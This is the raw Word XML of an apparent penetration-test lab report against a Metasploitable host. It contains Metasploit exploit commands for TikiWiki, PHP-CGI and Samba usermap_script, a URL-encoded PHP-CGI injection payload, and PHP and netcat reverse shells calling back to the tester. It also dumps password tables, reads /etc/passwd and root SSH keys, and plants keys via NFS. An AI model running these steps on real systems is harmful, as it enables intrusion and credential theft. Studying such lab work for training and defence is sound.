R&#10;R7NGfs0FHlUUUGlgooopjCiiigA8qiiilZC9mtwooop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oE/Zo/5Nx+FX/Yp6V/6RxV/P3X9An7NH/JuPwq/7FPSv/SOKgD8Sf2o&#10;v+TmPi3/ANjhqv8A6WyV5jXp37UX/JzHxb/7HDVf/S2SvM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oE/Zo/5Nx+FX/Yp&#10;6V/6RxV/P3X9An7NH/JuPwq/7FPSv/SOKgD8Sf2ov+TmPi3/ANjhqv8A6WyV5jXp37UX/JzHxb/7&#10;HDVf/S2SvM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BBR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6BP2aP+TcfhV/2Kelf+kcVfz91/QJ+zR/ybj8Kv+xT0r/0jioA/&#10;En9qL/k5j4t/9jhqv/pbJXmNenftRf8AJzHxb/7HDVf/AEtkrz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oE/Zo/5Nx+FX/Yp6V/6RxV/P3X9An7NH/JuPwq/7FPSv/SOKgD8S&#10;f2ov+TmPi3/2OGq/+lsleY16d+1F/wAnMfFv/scNV/8AS2SvM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6BP2aP+TcfhV/2Kelf+kcVfz91/QJ+zR/ybj8&#10;Kv8AsU9K/wDSOKgD8Sf2ov8Ak5j4t/8AY4ar/wClsleY16d+1F/ycx8W/wDscNV/9LZK8x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BBR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gT9mj/k3H4Vf9inpX/pHFX8/df0Cfs0f8m4/Cr/sU9K/9I4qA&#10;PxJ/ai/5OY+Lf/Y4ar/6WyV5jXp37UX/ACcx8W/+xw1X/wBLZK8x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oE/Zo/5Nx+FX/Yp6V/6RxV/P3X9An7NH/JuPwq/7FPSv/SOKgD8Sf2ov&#10;+TmPi3/2OGq/+lsleY16d+1F/wAnMfFv/scNV/8AS2SvM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&#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fva+w/+FJeCf8AoDR/9/KP+FJeCf8A&#10;oDR/9/KP9bMH/JMP9e8H/wA+5nx5+9or7D/4Uv4M/wCgMn/fyj/hS/gz/oDJ/wB/Kf8ArLgh/wCv&#10;eD/kmfIEn+okryS5/wCPiT/rpX6Pf8KR8IeXJ/xJo/8AVyf8tK/NXXJHh13Vo45P3cd5JHH/AN/K&#10;/QeF8yoZhOp7P7B+Y8YcRUM5hT9nT+AsUVm/ap/79H2qf+/X6Afkx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X7kfs56XPof7Pfww03UdOuLXULPwvpdvcwXVviWOVLSJXV/wDaBBB9waKKAP/ZUEsD&#10;BAoAAAAAAAAAIQA6BQA+9PYAAPT2AAAUAAAAZHJzL21lZGlhL2ltYWdlNS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4+ftAfFDw38fvibp&#10;um/EzxjY6fb+KNUt47e31+7jjt447yTy444/M/dx1w//AA1B8Y/+iueOP/CkvP8A45S/tRf8nMfF&#10;v/scNV/9LZK8x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rzKigD079qL/k5j4t/9jhqv/pbJXmNenftRf8AJzHx&#10;b/7HDVf/AEtkrzG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079qL/k5j4t/wDY4ar/AOlsleY16d+1F/ycx8W/+xw1X/0tkrzG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&#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&#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&#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&#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7"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8"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9"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66352;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50"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1"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2"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3"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4" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>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t>Description</w:t>
      </w:r>
      <w:r w:rsidR="008B708C">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542B0A4A" w14:textId="4327F64E" w:rsidR="002B73F5" w:rsidRDefault="008B708C" w:rsidP="008B708C">
      <w:r>
        <w:lastRenderedPageBreak/>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r w:rsidR="00531359">
        <w:t>Metasploite</w:t>
      </w:r>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p/php_cgi_arg_injec</w:t>
      </w:r>
      <w:r w:rsidR="008B6AC2">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00A52060">
        <w:t>ion</w:t>
      </w:r>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payload op ons (php/meterpreter/reverse_tcp)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authorized_keys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118303"/>
      <w:r w:rsidRPr="00545F98">
        <w:lastRenderedPageBreak/>
        <w:t>tikiwiki_graph_formula_exec</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="61E428A6" w14:textId="200CA87D" w:rsidR="004872DF" w:rsidRDefault="004872DF" w:rsidP="004872DF">
      <w:r>
        <w:t>List of CVEs: CVE-2007-5423</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A585BA" w14:textId="08F86058" w:rsidR="004872DF" w:rsidRPr="004872DF" w:rsidRDefault="004872DF" w:rsidP="004872DF">
      <w:r>
        <w:t>TikiWiki (&lt;= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary PHP code. The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input supplied to create_function(), which may allow a remote attacker to execute arbitrary PHP code resulting in a loss of integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194E8A2C" w14:textId="754FD34F" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t xml:space="preserve">firefox </w:t>
      </w:r>
      <w:r w:rsidR="00084769" w:rsidRPr="00084769">
        <w:t>192.168.254.186</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75176EBB" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>cd /pentest/web/dirbuster</w:t>
      </w:r>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r>
        <w:t xml:space="preserve">firefox </w:t>
      </w:r>
      <w:r w:rsidR="00084769" w:rsidRPr="00084769">
        <w:t xml:space="preserve">192.168.254.186 </w:t>
      </w:r>
      <w:r>
        <w:t>/tikiwiki</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657CC238" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E33DD32" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>search tikiwiki</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B9B4DC" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>use use admin/tikiwiki/tikidblib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C32C4" w14:textId="02B08FAD" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t xml:space="preserve">setg RHOST </w:t>
      </w:r>
      <w:r w:rsidR="00084769" w:rsidRPr="00084769">
        <w:t>192.168.254.186</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151450B0" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47682E5A" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>firefox -&gt; www.exploit-db.com -&gt; TikiWiki (2701).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C7184D" w14:textId="09470708" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t xml:space="preserve">firefox </w:t>
      </w:r>
      <w:r w:rsidR="00084769" w:rsidRPr="00084769">
        <w:t xml:space="preserve">192.168.254.186 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/tikiwiki/ -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00084769" w:rsidRPr="00084769">
        <w:t xml:space="preserve">192.168.254.186 </w:t>
      </w:r>
      <w:r>
        <w:t>/tikiwiki/tiki</w:t>
      </w:r>
      <w:r w:rsidR="0086149A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>listpages.php?offset=0&amp;sort_mode=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFC0124" w14:textId="416E3AC7" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>mysql -h 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00084769">
        <w:t>254</w:t>
      </w:r>
      <w:r>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="00084769">
        <w:t>86</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C47A47" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C93C91D" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>use tikiwiki195;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9736C6" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101D3096" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>select * from users_users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD9820" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>select login, password from users_users;</w:t>
      </w:r>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[new passowrd]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCF6F62" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>php reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F0F0E6" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>php-reverse-shell.php -&gt; shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3716FAC0" w14:textId="021139F6" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>shell.php -&gt; Replace: 127.0.0.1 with 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="005E0814">
        <w:t>24.186</w:t>
      </w:r>
      <w:r>
        <w:t>]. Replace: 1234 with 4321.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E592B" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>nc -v -l -p 4321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CF69B0" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>whoami</w:t>
      </w:r>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search tikiwiki</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDECE4D" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>use exploit/unix/webapp/tikiwiki_graph_formula_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D1DA4" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4386E2DC" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B9FA4C" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>setg payload generic/shell_bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C4106D" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>show options</w:t>
      </w:r>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r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1998AE" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0318B0" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>ls -lart /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D6EABD" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>ls -lart /root/.ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F7FD1F" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>cat /root/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B66B66" w14:textId="2C6A5437" w:rsidR="00CE3F82" w:rsidRDefault="00137E89" w:rsidP="00CE3F82">
      <w:r>
        <w:t xml:space="preserve">I tried an alternative script </w:t>
      </w:r>
      <w:r w:rsidR="00CE3F82">
        <w:t xml:space="preserve">Debian OpenSSL Predictable (5720) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and I used the </w:t>
      </w:r>
      <w:r w:rsidR="00CE3F82">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA2FF3">
        <w:t>the script downloaded for ruby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED411E6" w14:textId="10321507" w:rsidR="00AA2FF3" w:rsidRDefault="00AA2FF3" w:rsidP="00CE3F82">
      <w:r>
        <w:t xml:space="preserve">use the keys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8"/>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9"/>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60"/>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cd rsa/2048</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9D5D08" w14:textId="77777777" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t>grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE kcP Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc Wv8Vw7bwkf 1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F06C629" w14:textId="78377512" w:rsidR="00CE3F82" w:rsidRDefault="00CE3F82" w:rsidP="00CE3F82">
      <w:r>
        <w:t xml:space="preserve">ssh -i 57c3115d77c56390332dc5c49978627a-5429 </w:t>
      </w:r>
      <w:hyperlink r:id="rId61"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TWiki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lastRenderedPageBreak/>
        <w:t>cve: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118304"/>
      <w:r>
        <w:t>TWiki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let attackers steal cookie-based authentication credentials or compromise the a_ected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VendorFix</w:t>
      </w:r>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A_ected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TWiki, TWiki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_aws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the attackers execute perl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118305"/>
      <w:r>
        <w:t>Miscon</w:t>
      </w:r>
      <w:r w:rsidR="0074482D">
        <w:t>fi</w:t>
      </w:r>
      <w:r>
        <w:t>gured web servers allows remote clients to perform dangerous HTTP methods such as</w:t>
      </w:r>
      <w:r w:rsidR="00983F34">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>PUT and DELETE.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>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1" w:name="_Toc155118306"/>
      <w:r w:rsidRPr="00A21FEE">
        <w:t xml:space="preserve">PHP-CGI-based setups vulnerability when parsing query string parameters from php </w:t>
      </w:r>
      <w:r>
        <w:t>fil</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21FEE">
        <w:t>les.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>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CVE-2012-2336</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D25F46C" w14:textId="51DA37BA" w:rsidR="00704CCF" w:rsidRPr="00704CCF" w:rsidRDefault="00704CCF" w:rsidP="00704CCF">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cve: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"HTTP POST" body : &lt;?php phpinfo();?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180CA632" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>URL : http://192.168.254.186/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38508795" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>,→75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046E3A8C" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>,→D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C8B10E" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>,→%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153D0F4D" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>,→+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6280ACB3" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>,→%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6E43E9" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>,→63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A304FA3" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>,→E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6BDBC8" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>it was possible to execute the "&lt;?php phpinfo();?&gt;" command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB7102" w14:textId="77777777" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">
      <w:r>
        <w:t>Result: &lt;title&gt;phpinfo()&lt;/title&gt;&lt;meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345DFA61" w14:textId="7B8B1C2F" w:rsidR="005277C9" w:rsidRDefault="005277C9" w:rsidP="005277C9">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When PHP is used in a CGI-based setup (such as Apache's mod_cgid), the php-cgi receives</w:t>
      </w:r>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command-line</w:t>
      </w:r>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switches, such as -s, -d or -c to be passed to the php-cgi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An example of the -s command, allowing an attacker to view the source code of index.php is</w:t>
      </w:r>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2" w:name="_Toc155118307"/>
      <w:r>
        <w:t>Po</w:t>
      </w:r>
      <w:r w:rsidR="006A7485">
        <w:t>rt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 445</w:t>
      </w:r>
      <w:r w:rsidR="002F6D85">
        <w:t xml:space="preserve"> Samba</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="758F2A20" w14:textId="532AF352" w:rsidR="00CE59DA" w:rsidRDefault="000308AC" w:rsidP="000308AC">
      <w:r>
        <w:t xml:space="preserve">Tested </w:t>
      </w:r>
      <w:r w:rsidR="007535CE">
        <w:t xml:space="preserve">anonymous login </w:t>
      </w:r>
      <w:r w:rsidR="00636FD3">
        <w:t>using smb</w:t>
      </w:r>
      <w:r w:rsidR="00CE59DA">
        <w:t xml:space="preserve">client </w:t>
      </w:r>
      <w:r w:rsidR="005F602F">
        <w:t>-L to list shares</w:t>
      </w:r>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2"/>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Which was successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6936EC05" w14:textId="15543F9E" w:rsidR="004A3182" w:rsidRDefault="004A3182" w:rsidP="000308AC">
      <w:r>
        <w:t xml:space="preserve">I was able to browse to the tmp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3"/>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Run the following in Metasploit download the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319CAC0E" w14:textId="4638BAC1" w:rsidR="002F7A99" w:rsidRDefault="007E20E5" w:rsidP="007D2B9F">
      <w:r>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidR="002F7A99" w:rsidRPr="002F7A99">
        <w:t xml:space="preserve">exploit/multi/samba/usermap_script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cmd/unix/reverse_netcat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Now let’s revisit the SSH issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1082B18A" w14:textId="2ED6609B" w:rsidR="00461B33" w:rsidRDefault="00461B33" w:rsidP="00461B33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc155118308"/>
      <w:r>
        <w:t>Revisit SSH</w:t>
      </w:r>
      <w:r w:rsidR="00244791">
        <w:t xml:space="preserve"> 23</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="6D27E738" w14:textId="036F9186" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">Lets look at whats going on with the keys run  cat /root/.ssh/authorized_keys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-lr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oHostKeyAlgorithms=+ssh-dss msfadmin@192.168.254.186  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3117713D" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">I could create a public key on the local machine and add keys to SSH authorized_keys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id_rsa).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automa cally add the public key to the authorized_keys file on the remote server and set the correct permissions.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D04A358" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">Private Key ssh_login_pubkey  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C88C0B8" w14:textId="5FAA1070" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">But I have enough permissions to go a er the private auxiliary/scanner/ssh/ssh_login_pubkey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Metasploitable, happens to be possible!): see Metasploitable/NFS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cular machine, wile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rpcbind start  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CE204A" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># mkdir /tmp/target  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB964AA" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve"># mount -t nfs 10.0.0.27:/ /temp/target  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F57A6EC" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve"># cp /tmp/target/home/msfadmin/.ssh/id_rsa /tmp/r00tprivatekey  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AB8B6B" w14:textId="77777777" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve"># umount /tmp/target  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3F37C3" w14:textId="5BE231DD" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">Now you have a copy of the msfadmin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impersona ng the target when connec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the a acker machine, the machine you want to have access WITH, and add it to the other machine's ~/.ssh/authorized_keys.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 xml:space="preserve">auxiliary(ssh_login_pubkey) &gt; run  ssh login brute force </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C16194" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00101BC7" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00FB3914">
        <w:t xml:space="preserve"># service rpcbind start  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C92FB3" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve"># mkdir /tmp/target  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1637C411" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve"># mount -t nfs 192.168.254.182:/ /temp/target  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74697213" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve"># cd /tmp/target/home/msfadmin/ &amp;&amp; mkdir .ssh/  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4A420F" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve"># echo ~/.ssh/id_rsa &gt;&gt; /tmp/target/home/msfadmin/.ssh/authorized_keys  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D4E251" w14:textId="31BA63C6" w:rsidR="001F694B" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t># umount /tmp/targ</w:t>
      </w:r>
      <w:r w:rsidR="001F694B">
        <w:t>et</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFC4179" w14:textId="58E8C4DB" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve">Settinng Up the ATTack  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B68AA2D" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve">Here's info on the auxiliary/scanner/ssh/ssh_login_pubkey module in Metasploit, which will carry out the attack:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29557DC8" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve">use auxiliary/scanner/ssh/ssh_login_pubkey  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC717D4" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve">Set some op ons, such as the private key file, the username to log in with, and the remote host:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4887F441" w14:textId="77777777" w:rsidR="001F694B" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">auxiliary(ssh_login_pubkey) &gt; set KEY_FILE /tmp/r00tprivatekey KEY_FILE =&gt; /tmp/id_rsa auxiliary(ssh_login_pubkey) &gt; set USERNAME root USERNAME =&gt; root  auxiliary(ssh_login_pubkey) </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">RHOSTS 192.168.254.186 set RHOSTS =&gt; 192.168.254.186 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EA065F" w14:textId="5692605F" w:rsidR="00FB3914" w:rsidRDefault="00FB3914" w:rsidP="00FB3914">
      <w:r>
        <w:t xml:space="preserve">msf auxiliary(ssh_login_pubkey)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 xml:space="preserve">auxiliary(ssh_login_pubkey) &gt; run </w:t>
      </w:r>
